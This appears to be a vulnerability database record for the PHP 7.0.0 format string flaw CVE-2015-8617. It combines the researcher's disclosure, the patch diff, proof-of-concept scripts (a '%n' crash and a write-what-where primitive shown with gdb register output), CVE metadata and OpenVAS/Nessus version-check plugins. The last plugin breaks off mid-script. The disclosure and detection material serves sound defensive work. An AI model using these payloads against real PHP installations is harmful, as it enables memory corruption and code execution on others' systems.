ID 1337DAY-ID-25750 Type zdt Reporter Andrew Kramer Modified 2015-12-23T00:00:00
Description
Exploit for multiple platform in category dos / poc
Overview
--------------------------------------------
A fun little format string vulnerability exists in PHP 7.0.0 due to how
non-existent class names are handled. From my limited research I
believe this issue is likely exploitable for full code execution (see
test script below). This issue does not appear to be present in
previous PHP versions and has been patched in version 7.0.1. If you
build a working exploit, drop me a line, I'd love to see (andrew at
jmpesp dot org). Shout out to the PHP team for fixing this so quickly
and for building a great product. Greetz to my DSU crew.
Timeline
--------------------------------------------
12/11/2015: Discovered
12/12/2015: Reported to PHP team
12/13/2015: Patch accepted and committed
12/17/2015: PHP 7.0.1 released containing patch
12/22/2015: Publicly disclosed
Vulnerability/Patch
--------------------------------------------
diff -rup php-7.0.0_old/Zend/zend_execute_API.c
php-7.0.0_new/Zend/zend_execute_API.c
--- php-7.0.0_old/Zend/zend_execute_API.c 2015-12-01 07:36:25.000000000
-0600
+++ php-7.0.0_new/Zend/zend_execute_API.c 2015-12-12 12:24:24.999391117
-0600
@@ -218,7 +218,7 @@ static void zend_throw_or_error(int fetc
zend_vspprintf(&message, 0, format, va);
if (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) {
- zend_throw_error(exception_ce, message);
+ zend_throw_error(exception_ce, "%s", message);
} else {
zend_error(E_ERROR, "%s", message);
}
Proof of Concept #1 (simple segfault)
--------------------------------------------
<?php $name="%n%n%n%n%n"; $name::doSomething(); ?>
Proof of Concept #2 (write-what-where primitive)
--------------------------------------------
[email protected] /tmp/php-7.0.0_64 % cat /tmp/test.php
<?php
ini_set("memory_limit", "4G"); // there's probably a much cleaner way to
do this
$rdx = 0x42424242; // what
$rax = 0x43434343; // where
$name = "%" . ($rdx - 8) . "d" . "%d" . "%n" . str_repeat("A", ($rax -
34)); // your offsets may differ.
$name::doSomething();
?>
[email protected] /tmp/php-7.0.0_64 % gdb sapi/cli/php
GNU gdb (GDB) 7.10
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show
copying"
and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from sapi/cli/php...done.
(gdb) r /tmp/test.php
Starting program: /tmp/php-7.0.0_64/sapi/cli/php /tmp/test64.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x0000000000672935 in xbuf_format_converter
([email protected]=0x7fffffffa610, [email protected]=1 '\001',
fmt=<optimized out>, ap=0x7fffffffa658)
at /tmp/php-7.0.0_64/main/spprintf.c:744
744 *(va_arg(ap, int *)) = is_char? (int)((smart_string
*)xbuf)->len : (int)ZSTR_LEN(((smart_str *)xbuf)->s);
(gdb) i r
rax 0x43434343 1128481603
rbx 0x7fffb2800016 140736188121110
rcx 0x6e 110
rdx 0x42424242 1111638594
rsi 0x7fffffff9db0 140737488330160
rdi 0x7fffffffa658 140737488332376
rbp 0x1 0x1
rsp 0x7fffffff9d50 0x7fffffff9d50
r8 0x7fffffff9db0 140737488330160
r9 0x7fffb2800016 140736188121110
r10 0x0 0
r11 0x0 0
r12 0x20 32
r13 0x7fffffffa610 140737488332304
r14 0x0 0
r15 0x4242423a 1111638586
rip 0x672935 0x672935 <xbuf_format_converter+1845>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/1i $rip
=> 0x672935 <xbuf_format_converter+1845>: mov DWORD PTR [rax],edx
(gdb)
# 0day.today [2018-04-08] #
{"sourceData": "Overview\r\n--------------------------------------------\r\nA fun little format string vulnerability exists in PHP 7.0.0 due to how \r\nnon-existent class names are handled. From my limited research I \r\nbelieve this issue is likely exploitable for full code execution (see \r\ntest script below). This issue does not appear to be present in \r\nprevious PHP versions and has been patched in version 7.0.1. If you \r\nbuild a working exploit, drop me a line, I'd love to see (andrew at \r\njmpesp dot org). Shout out to the PHP team for fixing this so quickly \r\nand for building a great product. Greetz to my DSU crew.\r\n \r\n \r\n \r\nTimeline\r\n--------------------------------------------\r\n12/11/2015: Discovered\r\n12/12/2015: Reported to PHP team\r\n12/13/2015: Patch accepted and committed\r\n12/17/2015: PHP 7.0.1 released containing patch\r\n12/22/2015: Publicly disclosed\r\n \r\n \r\n \r\nVulnerability/Patch\r\n--------------------------------------------\r\ndiff -rup php-7.0.0_old/Zend/zend_execute_API.c \r\nphp-7.0.0_new/Zend/zend_execute_API.c\r\n--- php-7.0.0_old/Zend/zend_execute_API.c 2015-12-01 07:36:25.000000000 \r\n-0600\r\n+++ php-7.0.0_new/Zend/zend_execute_API.c 2015-12-12 12:24:24.999391117 \r\n-0600\r\n@@ -218,7 +218,7 @@ static void zend_throw_or_error(int fetc\r\n zend_vspprintf(&message, 0, format, va);\r\n \r\n if (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) {\r\n- zend_throw_error(exception_ce, message);\r\n+ zend_throw_error(exception_ce, \"%s\", message);\r\n } else {\r\n zend_error(E_ERROR, \"%s\", message);\r\n }\r\n \r\n \r\n \r\nProof of Concept #1 (simple segfault)\r\n--------------------------------------------\r\n<?php $name=\"%n%n%n%n%n\"; $name::doSomething(); ?>\r\n \r\n \r\n \r\nProof of Concept #2 (write-what-where primitive)\r\n--------------------------------------------\r\n[email\u00a0protected] /tmp/php-7.0.0_64 % cat /tmp/test.php\r\n<?php\r\nini_set(\"memory_limit\", \"4G\"); // there's probably a much cleaner way to \r\ndo this\r\n$rdx = 0x42424242; // what\r\n$rax = 0x43434343; // where\r\n$name = \"%\" . ($rdx - 8) . \"d\" . \"%d\" . \"%n\" . str_repeat(\"A\", ($rax - \r\n34)); // your offsets may differ.\r\n$name::doSomething();\r\n?>\r\n \r\n[email\u00a0protected] /tmp/php-7.0.0_64 % gdb sapi/cli/php\r\nGNU gdb (GDB) 7.10\r\nCopyright (C) 2015 Free Software Foundation, Inc.\r\nLicense GPLv3+: GNU GPL version 3 or later \r\n<http://gnu.org/licenses/gpl.html>\r\nThis is free software: you are free to change and redistribute it.\r\nThere is NO WARRANTY, to the extent permitted by law. Type \"show \r\ncopying\"\r\nand \"show warranty\" for details.\r\nThis GDB was configured as \"x86_64-unknown-linux-gnu\".\r\nType \"show configuration\" for configuration details.\r\nFor bug reporting instructions, please see:\r\n<http://www.gnu.org/software/gdb/bugs/>.\r\nFind the GDB manual and other documentation resources online at:\r\n<http://www.gnu.org/software/gdb/documentation/>.\r\nFor help, type \"help\".\r\nType \"apropos word\" to search for commands related to \"word\"...\r\nReading symbols from sapi/cli/php...done.\r\n(gdb) r /tmp/test.php\r\nStarting program: /tmp/php-7.0.0_64/sapi/cli/php /tmp/test64.php\r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/usr/lib/libthread_db.so.1\".\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0000000000672935 in xbuf_format_converter \r\n([email\u00a0protected]=0x7fffffffa610, [email\u00a0protected]=1 '\\001', \r\nfmt=<optimized out>, ap=0x7fffffffa658)\r\n at /tmp/php-7.0.0_64/main/spprintf.c:744\r\n744 *(va_arg(ap, int *)) = is_char? (int)((smart_string \r\n*)xbuf)->len : (int)ZSTR_LEN(((smart_str *)xbuf)->s);\r\n(gdb) i r\r\nrax 0x43434343 1128481603\r\nrbx 0x7fffb2800016 140736188121110\r\nrcx 0x6e 110\r\nrdx 0x42424242 1111638594\r\nrsi 0x7fffffff9db0 140737488330160\r\nrdi 0x7fffffffa658 140737488332376\r\nrbp 0x1 0x1\r\nrsp 0x7fffffff9d50 0x7fffffff9d50\r\nr8 0x7fffffff9db0 140737488330160\r\nr9 0x7fffb2800016 140736188121110\r\nr10 0x0 0\r\nr11 0x0 0\r\nr12 0x20 32\r\nr13 0x7fffffffa610 140737488332304\r\nr14 0x0 0\r\nr15 0x4242423a 1111638586\r\nrip 0x672935 0x672935 <xbuf_format_converter+1845>\r\neflags 0x10202 [ IF RF ]\r\ncs 0x33 51\r\nss 0x2b 43\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/1i $rip\r\n=> 0x672935 <xbuf_format_converter+1845>: mov DWORD PTR [rax],edx\r\n(gdb)\n\n# 0day.today [2018-04-08] #", "description": "Exploit for multiple platform in category dos / poc", "sourceHref": "https://0day.today/exploit/25750", "reporter": "Andrew Kramer", "href": "https://0day.today/exploit/description/25750", "type": "zdt", "viewCount": 11, "references": [], "lastseen": "2018-04-08T22:57:30", "published": "2015-12-23T00:00:00", "cvelist": ["CVE-2015-8617"], "id": "1337DAY-ID-25750", "modified": "2015-12-23T00:00:00", "title": "PHP 7.0.0 - Format String", "edition": 1, "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2018-04-08T22:57:30", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-8617"]}, {"type": "exploitdb", "idList": ["EDB-ID:39082"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310807506", "OPENVAS:1361412562310807090"]}, {"type": "nessus", "idList": ["PHP_7_0_1.NASL"]}, {"type": "kaspersky", "idList": ["KLA10747", "KLA10746"]}], "modified": "2018-04-08T22:57:30", "rev": 2}, "vulnersScore": 6.6}, "immutableFields": []}
{"cve": [{"lastseen": "2021-04-22T23:51:49", "description": "Format string vulnerability in the zend_throw_or_error function in Zend/zend_execute_API.c in PHP 7.x before 7.0.1 allows remote attackers to execute arbitrary code via format string specifiers in a string that is misused as a class name, leading to incorrect error handling.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-01-19T05:59:00", "title": "CVE-2015-8617", "type": "cve", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8617"], "modified": "2017-09-10T01:29:00", "cpe": ["cpe:/a:php:php:7.0.1"], "id": "CVE-2015-8617", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:php:php:7.0.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-04T09:28:05", "description": "PHP 7.0.0 - Format String Vulnerability. CVE-2015-8617. Dos exploits for multiple platform", "published": "2015-12-23T00:00:00", "type": "exploitdb", "title": "PHP 7.0.0 - Format String Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8617"], "modified": "2015-12-23T00:00:00", "id": "EDB-ID:39082", "href": "https://www.exploit-db.com/exploits/39082/", "sourceData": "Overview\r\n--------------------------------------------\r\nA fun little format string vulnerability exists in PHP 7.0.0 due to how \r\nnon-existent class names are handled. From my limited research I \r\nbelieve this issue is likely exploitable for full code execution (see \r\ntest script below). This issue does not appear to be present in \r\nprevious PHP versions and has been patched in version 7.0.1. If you \r\nbuild a working exploit, drop me a line, I'd love to see (andrew at \r\njmpesp dot org). Shout out to the PHP team for fixing this so quickly \r\nand for building a great product. Greetz to my DSU crew.\r\n\r\n\r\n\r\nTimeline\r\n--------------------------------------------\r\n12/11/2015: Discovered\r\n12/12/2015: Reported to PHP team\r\n12/13/2015: Patch accepted and committed\r\n12/17/2015: PHP 7.0.1 released containing patch\r\n12/22/2015: Publicly disclosed\r\n\r\n\r\n\r\nVulnerability/Patch\r\n--------------------------------------------\r\ndiff -rup php-7.0.0_old/Zend/zend_execute_API.c \r\nphp-7.0.0_new/Zend/zend_execute_API.c\r\n--- php-7.0.0_old/Zend/zend_execute_API.c\t2015-12-01 07:36:25.000000000 \r\n-0600\r\n+++ php-7.0.0_new/Zend/zend_execute_API.c\t2015-12-12 12:24:24.999391117 \r\n-0600\r\n@@ -218,7 +218,7 @@ static void zend_throw_or_error(int fetc\r\n \tzend_vspprintf(&message, 0, format, va);\r\n\r\n \tif (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) {\r\n-\t\tzend_throw_error(exception_ce, message);\r\n+\t\tzend_throw_error(exception_ce, \"%s\", message);\r\n \t} else {\r\n \t\tzend_error(E_ERROR, \"%s\", message);\r\n \t}\r\n\r\n\r\n\r\nProof of Concept #1 (simple segfault)\r\n--------------------------------------------\r\n<?php $name=\"%n%n%n%n%n\"; $name::doSomething(); ?>\r\n\r\n\r\n\r\nProof of Concept #2 (write-what-where primitive)\r\n--------------------------------------------\r\nandrew@thinkpad /tmp/php-7.0.0_64 % cat /tmp/test.php\r\n<?php\r\nini_set(\"memory_limit\", \"4G\"); // there's probably a much cleaner way to \r\ndo this\r\n$rdx = 0x42424242; // what\r\n$rax = 0x43434343; // where\r\n$name = \"%\" . ($rdx - 8) . \"d\" . \"%d\" . \"%n\" . str_repeat(\"A\", ($rax - \r\n34)); // your offsets may differ.\r\n$name::doSomething();\r\n?>\r\n\r\nandrew@thinkpad /tmp/php-7.0.0_64 % gdb sapi/cli/php\r\nGNU gdb (GDB) 7.10\r\nCopyright (C) 2015 Free Software Foundation, Inc.\r\nLicense GPLv3+: GNU GPL version 3 or later \r\n<http://gnu.org/licenses/gpl.html>\r\nThis is free software: you are free to change and redistribute it.\r\nThere is NO WARRANTY, to the extent permitted by law. Type \"show \r\ncopying\"\r\nand \"show warranty\" for details.\r\nThis GDB was configured as \"x86_64-unknown-linux-gnu\".\r\nType \"show configuration\" for configuration details.\r\nFor bug reporting instructions, please see:\r\n<http://www.gnu.org/software/gdb/bugs/>.\r\nFind the GDB manual and other documentation resources online at:\r\n<http://www.gnu.org/software/gdb/documentation/>.\r\nFor help, type \"help\".\r\nType \"apropos word\" to search for commands related to \"word\"...\r\nReading symbols from sapi/cli/php...done.\r\n(gdb) r /tmp/test.php\r\nStarting program: /tmp/php-7.0.0_64/sapi/cli/php /tmp/test64.php\r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/usr/lib/libthread_db.so.1\".\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0000000000672935 in xbuf_format_converter \r\n(xbuf=xbuf@entry=0x7fffffffa610, is_char=is_char@entry=1 '\\001', \r\nfmt=<optimized out>, ap=0x7fffffffa658)\r\n at /tmp/php-7.0.0_64/main/spprintf.c:744\r\n744\t\t\t\t\t\t*(va_arg(ap, int *)) = is_char? (int)((smart_string \r\n*)xbuf)->len : (int)ZSTR_LEN(((smart_str *)xbuf)->s);\r\n(gdb) i r\r\nrax 0x43434343\t1128481603\r\nrbx 0x7fffb2800016\t140736188121110\r\nrcx 0x6e\t110\r\nrdx 0x42424242\t1111638594\r\nrsi 0x7fffffff9db0\t140737488330160\r\nrdi 0x7fffffffa658\t140737488332376\r\nrbp 0x1\t0x1\r\nrsp 0x7fffffff9d50\t0x7fffffff9d50\r\nr8 0x7fffffff9db0\t140737488330160\r\nr9 0x7fffb2800016\t140736188121110\r\nr10 0x0\t0\r\nr11 0x0\t0\r\nr12 0x20\t32\r\nr13 0x7fffffffa610\t140737488332304\r\nr14 0x0\t0\r\nr15 0x4242423a\t1111638586\r\nrip 0x672935\t0x672935 <xbuf_format_converter+1845>\r\neflags 0x10202\t[ IF RF ]\r\ncs 0x33\t51\r\nss 0x2b\t43\r\nds 0x0\t0\r\nes 0x0\t0\r\nfs 0x0\t0\r\ngs 0x0\t0\r\n(gdb) x/1i $rip\r\n=> 0x672935 <xbuf_format_converter+1845>:\tmov DWORD PTR [rax],edx\r\n(gdb)\r\n\r\n\r\n\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/39082/"}], "openvas": [{"lastseen": "2019-05-29T18:35:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8617", "CVE-2015-8616"], "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "modified": "2018-11-13T00:00:00", "published": "2016-03-01T00:00:00", "id": "OPENVAS:1361412562310807090", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807090", "type": "openvas", "title": "PHP Multiple Vulnerabilities - 02 - Mar16 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_mult_vuln02_mar16_win.nasl 2016-03-01 16:56:54Z March$\n#\n# PHP Multiple Vulnerabilities - 02 - Mar16 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807090\");\n script_version(\"$Revision: 12338 $\");\n script_cve_id(\"CVE-2015-8617\", \"CVE-2015-8616\");\n script_bugtraq_id(79655, 79672);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-13 15:51:17 +0100 (Tue, 13 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-01 16:56:54 +0530 (Tue, 01 Mar 2016)\");\n script_name(\"PHP Multiple Vulnerabilities - 02 - Mar16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An use-after-free vulnerability in the 'Collator::sortWithSortKeys' function\n in 'ext/intl/collator/collator_sort.c' script.\n\n - A format string vulnerability in the 'zend_throw_or_error' function in\n 'Zend/zend_execute_API.c' script.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to execute arbitrary code within the context of the affected\n application and to crash the affected application.\");\n\n script_tag(name:\"affected\", value:\"PHP version 7.0.0 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 7.0.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-7.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=71105\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_equal(version:phpVer, test_version:\"7.0.0\"))\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:\"7.0.0\");\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8617", "CVE-2015-8616"], "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "modified": "2018-11-15T00:00:00", "published": "2016-03-01T00:00:00", "id": "OPENVAS:1361412562310807506", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807506", "type": "openvas", "title": "PHP Multiple Vulnerabilities - 02 - Mar16 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_mult_vuln02_mar16_lin.nasl 2016-03-01 16:56:54Z March$\n#\n# PHP Multiple Vulnerabilities - 02 - Mar16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807506\");\n script_version(\"$Revision: 12363 $\");\n script_cve_id(\"CVE-2015-8617\", \"CVE-2015-8616\");\n script_bugtraq_id(79655, 79672);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-15 10:51:15 +0100 (Thu, 15 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-01 16:56:54 +0530 (Tue, 01 Mar 2016)\");\n script_name(\"PHP Multiple Vulnerabilities - 02 - Mar16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An use-after-free vulnerability in the 'Collator::sortWithSortKeys' function\n in 'ext/intl/collator/collator_sort.c' script.\n\n - A format string vulnerability in the 'zend_throw_or_error' function in\n 'Zend/zend_execute_API.c' script.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to execute arbitrary code within the context of the affected\n application and to crash the affected application.\");\n\n script_tag(name:\"affected\", value:\"PHP version 7.0.0 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 7.0.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-7.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=71105\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_equal(version:phpVer, test_version:\"7.0.0\"))\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:\"7.0.0\");\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T13:26:09", "description": "According to its banner, the version of PHP running on the remote web\nserver is 7.0.x prior to 7.0.1. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A use-after-free error exists in the\n collator_sort_with_sort_keys() function due to improper\n clearing of pointers when destroying an array. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2015-8616)\n\n - A format string flaw exists in the zend_throw_or_error()\n function due to improper sanitization of format string\n specifiers (e.g. %s and %x) in user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8617)\n\n - A flaw exists in the php_password_make_salt() function\n due to a fall back to password salt generation in an\n insecure manner when attempts to read random bytes from\n the operating system's cryptographically secure\n pseudo-random number generator (CSPRING) fail. An\n attacker can exploit this to more easily predict the\n generated password salt.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-22T00:00:00", "title": "PHP 7.0.x < 7.0.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8617", "CVE-2015-8616"], "modified": "2015-12-22T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_7_0_1.NASL", "href": "https://www.tenable.com/plugins/nessus/87599", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87599);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-8616\", \"CVE-2015-8617\");\n script_bugtraq_id(79655, 79672);\n script_xref(name:\"EDB-ID\", value:\"139082\");\n\n script_name(english:\"PHP 7.0.x < 7.0.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 7.0.x prior to 7.0.1. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A use-after-free error exists in the\n collator_sort_with_sort_keys() function due to improper\n clearing of pointers when destroying an array. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2015-8616)\n\n - A format string flaw exists in the zend_throw_or_error()\n function due to improper sanitization of format string\n specifiers (e.g. %s and %x) in user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8617)\n\n - A flaw exists in the php_password_make_salt() function\n due to a fall back to password salt generation in an\n insecure manner when attempts to read random bytes from\n the operating system's cryptographically secure\n pseudo-random number generator (CSPRING) fail. An\n attacker can exploit this to more easily predict the\n generated password salt.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-7.php#7.0.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=71105\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=71020\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 7.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8617\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 